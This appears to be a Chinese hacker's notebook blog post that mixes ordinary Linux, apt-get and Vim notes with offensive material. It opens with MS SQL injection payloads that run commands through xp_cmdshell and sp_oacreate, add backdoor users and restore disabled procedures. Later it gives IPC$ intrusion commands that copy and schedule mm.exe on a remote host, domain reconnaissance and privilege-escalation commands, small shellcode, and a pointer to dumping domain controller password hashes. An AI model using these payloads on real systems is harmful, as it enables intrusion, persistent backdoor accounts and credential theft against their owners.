MS SQL Server注入语句

执行CMD命令

exec master..xp_cmdshell"net1 user zerosoul 123456 /add"

DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out EXEC sp_oamethod @s,[run], NULL, [E:\wwwroot\cmd.exe /c net1 user>E:\wwwroot\1.txt]

(sp_oacreate依赖odsole70.dll)

沙盘模式执行

开启沙盘

Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

2005开启openrowset

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user zerosoul$ 123456 /add")')

恢复xp_cmdshell(依赖xpsql70.dll或者xplog70.dll)

xp_cmdshell被禁用的情况下恢复

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

xp_cmdshell被删的情况下恢复

sp_dropextendedproc "xp_cmdshell"

sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

找不到函数情况下恢复

exec sp_dropextendedproc 'xp_cmdshell'

exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'

列目录(依赖xpstar.dll)

exec xp_dirtree 'D:\Microsoft SQL Server\MSSQL\',1,1;(注意带参数1,1，否则...会比较惨= =#)

exec xp_subdirs 'c:\'(这个只能列出目录，不能列文件)

查看扩展存储过程

EXEC sp_helpextendedproc;

关于HTTP头和访客IP

HTTP_CLIENT_IP:22.22.22.2
HTTP_X_FORWARDED_FOR:33.33.33.33
HTTP_REMOTE_ADDR:127.0.0.1

经过我亲测，只有REMOTE_ADDR不能伪造。

流行的判断IP的PHP代码:

function get_ip()

{

if(getenv('HTTP_CLIENT_IP')) {

$gb_ip = getenv('HTTP_CLIENT_IP');

}

elseif(getenv('HTTP_X_FORWARDED_FOR')) {

$gb_ip = getenv('HTTP_X_FORWARDED_FOR');

}

elseif(getenv('REMOTE_ADDR')) {

$gb_ip = getenv('REMOTE_ADDR');

}

else {

$gb_ip = $_SERVER['REMOTE_ADDR'];

}

return $gb_ip;

}

Linux 一些配置文件的位置

主要以Debian为例

grub配置文件menu.lst

/boot/grub/menu.lst

sudo user列表
/etc/sudoers

源列表-sources.list

/etc/apt/sources.list

语言配置文件

/etc/sysconfig/i18n

网卡配置文件

debain:/etc/sysconfig/network-scripts目录下，ifcfg-eth0，ifcfg-eth1文件分别是不同网卡的IP地址配置文件

ubuntu:/etc/network/interfaces

apt-get 命令参数详解

apt-cache search package 搜索包

apt-cache show package 获取包的相关信息，如说明、大小、版本等

sudo apt-get install package 安装包

sudo apt-get install package - - reinstall 重新安装包

sudo apt-get -f install 修复安装"-f = ——fix-missing"

sudo apt-get remove package 删除包

sudo apt-get remove package - - purge 删除包，包括删除配置文件等

sudo apt-get update 更新源

sudo apt-get upgrade 更新已安装的包

sudo apt-get dist-upgrade 升级系统

sudo apt-get dselect-upgrade 使用 dselect 升级

apt-cache depends package 了解使用依赖

apt-cache rdepends package 是查看该包被哪些包依赖

sudo apt-get build-dep package 安装相关的编译环境

apt-get source package 下载该包的源代码

sudo apt-get clean && sudo apt-get autoclean 清理无用的包

sudo apt-get check 检查是否有损坏的依赖

一些Linux命令

查看用户(这方法有点...)：

cat /etc/passwd | cut -f 1 -d:

终端下查找文件命令

find / -name bash
(假如从根目录/开始查找bash文件的话。)

查看内核版本号

uname -a

less /proc/version

查看发行版本

cat /etc/*release

cat /etc/issue

lsb_release -a

查看当前用户信息

id

查找程序路径(gcc为例)

which gcc

创建文件链接(快捷方式)

ln -s /usr/bin/proc /home/zerosoul/Desktop/proc

重启X

Ctrl+Alt+BackSpace sudo /etc/init.d/gdm force-reload sudo /etc/init.d/kdm force-reload 结束进程 先ps -A | grep nc查看进程PID，以nc为例，假如结果是1394 然后kill 1394(nc进程的PID) 或者killall nc，结束所有nc进程 user权限查看IP /sbin/ifconfig 因为/sbin目录下的所有程序只给了root用户环境变量

查看用户所在组

groups

cat /etc/group

查看文件权限属性

ls -l /bin/bash

(以bash为例)

查看文件大小时间等属性

ls -lh /bin/bash

(以bash为例)

下面这些转自:

http://www.songzi.org/blog/article.asp?id=170

平台:debian

升极核心：apt-get install kernel-image-2.6.7-1-686
安装中文支持：apt-get install locales
安装主题：apt-get install gdm-themes
中文字库：apt-get install xfonts-intl-chinese
fcitx输入：apt-get install fcitx
安装浏览器：apt-get insatll mozilla-firefox flashplugin nonfree
调整分辨率：xrandr gtf 1024*768 100
中文支持：apt-get install zhcon
x-window:apt-get install x-window-system-core
apt-get install gnome-core
基础设定：base-congfige
查看分区：fdisk -L /dev/hda(sda)
装载ntfs分区：mount -t NTFS /dev/sda6 /mnt/2003
目录打包：tar -cvf 包名 目录
tar -zcvf 压缩打包
查看系统启动时运行的程序： #rcconf
查看cpu信息： more /proc/cppuinfo
配置中文： dpkg -reconfigure locales
安装中文字体和扶持 ：
apt-get install ttf-arphic-bkaioompttf-arphic-bsmioolp xfonts -instl-chinese xcin
装载fat分区： mount -t vfat /dev/hda10 music
设置proxy,router ,dns
/etc/network/interfaces
/etc/resolv.conf

待续......

VIM常用命令列表

转自:http://blog.csdn.net/AbnerChai/

移动光标

上:k nk:向上移动n行 9999k或gg可以移到第一行 G移到最后一行
下:j nj:向下移动n行
左:h nh:向左移动n列
右:l nl:向右移动n列

w：光标以单词向前移动 nw：光标向前移动n个单词 光标到单词的第一个字母上
b：与w相反
e: 光标以单词向前移动 ne：光标向前移动n个单词 光标到单词的最后一个字母上
ge:与e相反

$:移动光标到行尾 n$:移动到第n行的行尾
0（Num）：移动光标到行首
^:移动光标到行首第一个非空字符上去

f:移动光标到当前行的字符a上，nf移动光标到当前行的第n个a字符上
F:相反

%:移动到与制匹配的括号上去（），{}，[]，<>等。

nG:移动到第n行上 G:到最后一行

CTRL＋G 得到当前光标在文件中的位置

翻页：

向前翻页：CTRL+F
向下移动半屏：CTRL＋G
向后翻页：CTRL+B

存盘：

:q! :不存盘退出
:e! :放弃修改文件内容，重新载入该文件编辑
:wq ：存盘退出

删除：

dw：删除一个单词,需将光标移到单词的第一个字母上，按dw，如果光标在单词任意位置，用daw
dnw:删除n个单词
dne:也可，只是删除到单词尾
dnl:向右删除n个字母
dnh:向左删除n个字母
dnj:向下删除n行
dnk:向上删除n行
d$：删除当前光标到改行的行尾的字母
dd：删除一行
cnw[word]:将n个word改变为word
cc:改变整行
C$:改变到行尾

J: 删除换行符，将光标移到改行，按shift+j删除行尾的换行符，下一行接上来了.

撤销：
u: 撤销前一次的操作
shif+u(U):撤销对该行的所有操作。

:set showmode :设置显示工作模式

o：在当前行的下面另起一行
O（shift+o)：在当前行的上面另起一行

nk或nj：光标向上或向下移n行，n为数字
an!【ESC】：在行后面加n个感叹号(!)
nx:执行n次x(删除)操作

ZZ：保存当前文档并退出VIM

:help ：查看帮助文档，在这之中，按CTRL+] 进入超连接，按CTRL＋O 返回。
:help subject :看某一主题的帮助，ZZ 退出帮助

:set number / set nonumber :显示/不显示行号
:set ruler /set noruler:显示/不显示标尺

/pattern 正方向搜索一个字符模式
?pattern 反方向搜索一个字符模式
然后按n 继续向下找

把光标放到某个单词上面，然后按×号键，表示查找这个单词
查找整个单词：/\

:set hlsearch 高亮显示查找到的单词
:set nohlsearch 关闭改功能

m[a-z]:在文中做标记，标记号可为a-z的26个字母，用`a可以移动到标记a处

查找替换：
way1:
/【word】 :查找某个word
cw【newword】:替换为新word
n: 继续查找
.: 执行替换

r:替换当前字符
nr字符：替换当前n个字符

way2:
:s/string1/string2/g:在一行中将string1替换为string2,g表示执行 用c表示需要确认
:num1,num2 s/string1/string2/g:在行num1至num2中间将string1替换为string2
:1,$ s/string1/string2/g:在全文中将string1替换为string2

v:进入visual 模式
【ESC】退出
V:shift+v 进入行的visual 模式
CTRL+V:进如块操作模式用o和O改变选择的边的大小。

粘贴：

p，这是粘贴用x或d删除的文本

复制：
ynw：复制n个单词
yy：复制一行
ynl:复制n个字符
y$:复制当前光标至行尾处
nyy:拷贝n行
完了用p粘贴

:split:分割一个窗口
:split file.c ：为另一个文件file.c分隔窗口
:nsplit file.c: 为另一个文件file.c分隔窗口，并指定其行数
CTRL＋W在窗口中切换
:close：关闭当前窗口

在所有行插入相同的内容如include，操作方法如下： 将光标移到开始插入的位置，按CTRL+V进入VISUAL模式，选择好模块后 按I（shift+i)，后插入要插入的文本，按[ESC]完成。

:read file.c 将文件file.c的内容插入到当前光标所在的下面
:0read file.c 将文件file.c的内容插入到当前文件的开始处(第0行）
:nread file.c 将文件file.c的内容插入到当前文件的第n行后面
:read !cmd :将外部命令cmd的输出插如到当前光标所在的下面

:n1,n2 write temp.c 将本文件中的n1,到n2行写入temp.c这个文件中去

CTRL＋L刷新屏幕
shift + < 左移一行 shift + > 右移一行

u: undo
CTRL+R: re-do
J: 合并一行
CTRL+p 自动完成功能
CTRL+g 查看当前文件全路径

q[a-z] 开始记录但前开始的操作为宏，名称可为【a-z】，然后用q终止录制宏。
用reg显示当前定义的所有的宏，用@[a-z]来在当前光标处执行宏[a-z].

经典IPC$入侵命令

IPC入侵本来大家都以为要慢慢淡出了（我开始也这么以为.....），但随着慢慢深入，发现内网渗透的时候还是少不了它，呵呵。

由于IPC这东西年代有点久远了，命令早已经没那么熟悉了，所以还是帖网上，以备查询。

注意如果对方用的是12小时的时钟，如果是下午一定要转换成24小时的时间来运行。

net use \\192.168.0.1\IPC$ "passwd" /user:"admintitrator"

　　
copy mm.exe \\192.168.0.1\c$

net time \\192.168.0.1

at \\192.168.0.1 11:05 c:\mm.exe
(假如net time 返回的是 11:04)

net time \\192.168.0.1

net use \\192.168.0.1\IPC$ /del

查看对方机器计划任务

at \\192.168.0.1

完了以后别忘了删除多余的或者写错了的计划任务

at \\192.168.0.1 /delete

或者

at 1 \\192.168.0.1 /delete(1这里指的是对应的计划任务ID)

域内网中的一些命令，有些可用于内网渗透

下面的命令不需要在域控制器上也可运行

net view

查看同一域/工作组的计算机列表

net view /domain

查看域/工作组列表

net view /domain:Secwing

查看Secwing域中计算机列表

net group /domain

查看所在域的组

net user /domain

查看所在域用户

net user /domain zerosoul 12345678

修改域用户密码，需要域管理员权限，或者Ctrl+Alt+Del点击修改则不需要域管理员权限

net localgroup administrators SECWING\zerosoul /add

域Users组用户添加到本地Administrators组，需要本地管理员或域管理员在本机登陆域后进行

下面的命令只能用于域控制器:

net group "Domain controllers"

查看域控制器(如果有多台)

net group

查看域的组

net group "domain admins"

查看域管理员

net group "domain users"

查看域管理员

PS:打开配置域控制器向导的命令

dcpromo

域Users组用户添加到本地Administrators组

以本地管理员用户登陆本机，或者以域管理员用户在本机登陆域后，运行下列命令:

net localgroup administrators SECWING\zerosoul /add

SECWING是所在域

zerosoul是域用户

PS:打开配置域控制器向导的命令

dcpromo

Call&Leave 解析@ ASM

Call addr

==

push $+4

jmp addr

leave

==

mov esp ebp

pop ebp

ShellCode

两组对应的ASM代码。

ASM1:

push ebp

mov ebp,esp

xor edi,edi

push edi

sub esp,04h

mov [ebp-08h],63h

mov [ebp-07h],6Dh

mov [ebp-06h],64h

mov [ebp-05h],2Eh

mov [ebp-04h],65h

mov [ebp-03h],78h

mov [ebp-02h],65h

lea eax,[ebp-08h]

push eax

mov edx,0x77bf93c7

call edx

leave //==mov esp,ebp + pop ebp

ASM2:

mov esp,ebp

push ebp

mov ebp,esp

xor edi,edi

push edi

sub esp,04h

mov byte ptr [ebp-08h],'e'

mov byte ptr [ebp-07h],'c'

mov byte ptr [ebp-06h],'h'

mov byte ptr [ebp-05h],'o'

mov byte ptr [ebp-04h],' '

mov byte ptr [ebp-03h],'x'

mov byte ptr [ebp-02h],'e'

lea eax,[ebp-08h]

push eax

mov eax,0x77bf93c7

call eax

add esp,5ch

pop ebp

查看Windows服务对应的端口

用记事本打开C:\WINDOWS\system32\drivers\etc\services查看

命令行查看3389端口

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"

CMD快速通道

下面内容保存卫reg文件并导入：

——————————————————————————————————

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\folder\shell\cmd]

@="Open CMD"

[HKEY_CLASSES_ROOT\folder\shell\cmd\command]

@="cmd.exe /k cd %1"

导出域控制器用户HASH

PWDUMP6和LC5的远程模式可以导出导出域控制器用户HASH。